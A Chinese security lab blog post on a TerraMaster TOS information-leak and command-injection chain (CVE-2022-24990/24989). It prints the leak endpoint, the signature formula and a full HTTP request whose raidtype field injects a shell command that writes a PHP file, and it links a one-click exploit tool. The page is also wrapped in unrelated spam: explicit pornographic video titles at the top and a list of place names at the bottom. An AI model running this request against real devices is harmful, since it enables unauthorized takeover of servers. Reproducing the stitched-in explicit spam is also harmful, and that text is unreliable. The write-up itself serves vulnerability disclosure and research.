老赵揉搓苏清雅双乳的视频_老头老太性行交视频_老同学3免费集_老师没戴套子C了我一天视频_老师的丰满大乳奶_老师把我添高潮了A片潘金莲

咨詢服務(wù)熱線

400-6446-808

創(chuàng)安實(shí)驗(yàn)室專欄
您的當(dāng)前位置:首頁 > 創(chuàng)安實(shí)驗(yàn)室專欄
創(chuàng)安實(shí)驗(yàn)室專欄丨TerraMaster TOS 信息泄漏到命令執(zhí)行
發(fā)布者:創(chuàng)信華通  發(fā)布時(shí)間:2022-12-21  瀏覽量:664次











古語有云:“學(xué)如逆水行舟,不進(jìn)則退。”面對如今隨時(shí)都在變化的網(wǎng)絡(luò)安全環(huán)境更是如此。為此,創(chuàng)信華通微信公眾號特開設(shè)“創(chuàng)安實(shí)驗(yàn)室專欄”,以記錄創(chuàng)信華通創(chuàng)安實(shí)驗(yàn)室在技術(shù)上的探索,加強(qiáng)同行間的交流,相互學(xué)習(xí),共同進(jìn)步。


?+

+

TerraMaster TOS 信息泄漏到命令執(zhí)行

漏洞描述

TerraMaster TOS 存在信息泄漏漏洞,攻擊者通過漏洞可以獲取服務(wù)器上的敏感信息,配合 CVE-2022-24989漏洞可以獲取服務(wù)器權(quán)限

影響范圍

TerraMaster TOS < 4.2.31

漏洞編號

CVE-2022-24990、CVE-2022-24989

漏洞等級

嚴(yán)重

漏洞復(fù)現(xiàn)

目前外界Exp/PoC已公開,創(chuàng)安實(shí)驗(yàn)室已驗(yàn)證該漏洞的可利用性:

數(shù)據(jù)包中只需要添加 User-Agent: TNAS, 可以訪問到敏感信息

poc: /module/api.php?mobile/webNasIPS

利用信息泄露的 PWD和mac地址,我們就可以利用這個(gè)命令執(zhí)行漏洞了

在發(fā)送請求包寫入 php惡意文件

其中md5(mac地址后三字節(jié) + 當(dāng)前時(shí)間戳) = $_SERVER['HTTP_SIGNATURE']

POST /module/api.php?mobile/createRaid HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

Authorization: PWD

Cache-Control: max-age=0

Content-Length: 82

Content-Type: application/x-www-form-urlencoded

Cookie: PHPSESSID=; tos_visit_time=時(shí)間戳

Signature: sign

Timestamp: 時(shí)間戳

Upgrade-Insecure-Requests: 1

User-Agent: TNAS

 

raidtype=%3Becho+%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3Evuln1.php&diskstring=XXXX


這里利用https://github.com/lishang520/CVE-2022-24990進(jìn)行一鍵獲取和上傳

修復(fù)建議

升級到安全版本


E·N·D


本文由創(chuàng)信華通創(chuàng)安實(shí)驗(yàn)室編輯。

本文僅限于個(gè)人學(xué)習(xí)和技術(shù)研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權(quán)攻擊等違法行為,均由使用者本人負(fù)責(zé),本單位不為此承擔(dān)任何責(zé)任。創(chuàng)安攻防實(shí)驗(yàn)室擁有對此文章的修改和解釋權(quán),如欲轉(zhuǎn)載或傳播此文章,必須保證此文章的完整性,包括版權(quán)聲明等全部內(nèi)容。


如有侵權(quán),請聯(lián)系后臺。




創(chuàng)安實(shí)驗(yàn)室

創(chuàng)信華通創(chuàng)安實(shí)驗(yàn)室,是成都創(chuàng)信華通信息技術(shù)有限公司旗下的技術(shù)研究團(tuán)隊(duì),成立于2021年9月,主要研究紅藍(lán)對抗、重大安全保障、應(yīng)急響應(yīng)等方向。

創(chuàng)安攻防實(shí)驗(yàn)室圓滿完成了多次公安舉辦的重要網(wǎng)絡(luò)安全保障和攻防演習(xí)活動,并積極參加各類網(wǎng)絡(luò)安全競賽,屢獲殊榮。

創(chuàng)安攻防實(shí)驗(yàn)室秉承創(chuàng)信華通的發(fā)展理念,致力打造國內(nèi)一流網(wǎng)絡(luò)安全團(tuán)隊(duì)。


通州区| 南木林县| 汨罗市| 建平县| 大洼县| 金川县| 崇礼县| 兴仁县| 中方县| 湟源县| 清水县| 鱼台县| 阿巴嘎旗| 武宣县| 巢湖市| 文昌市| 甘洛县| 大足县| 恩平市| 巴里| 屏南县| 介休市| 饶阳县| 云和县| 图木舒克市| 自治县| 若羌县| 达日县| 永泰县| 弥渡县| 柏乡县| 沂南县| 江安县| 酉阳| 阿拉善盟| 鞍山市| 龙胜| 沾化县| 南溪县| 瑞金市| 保康县|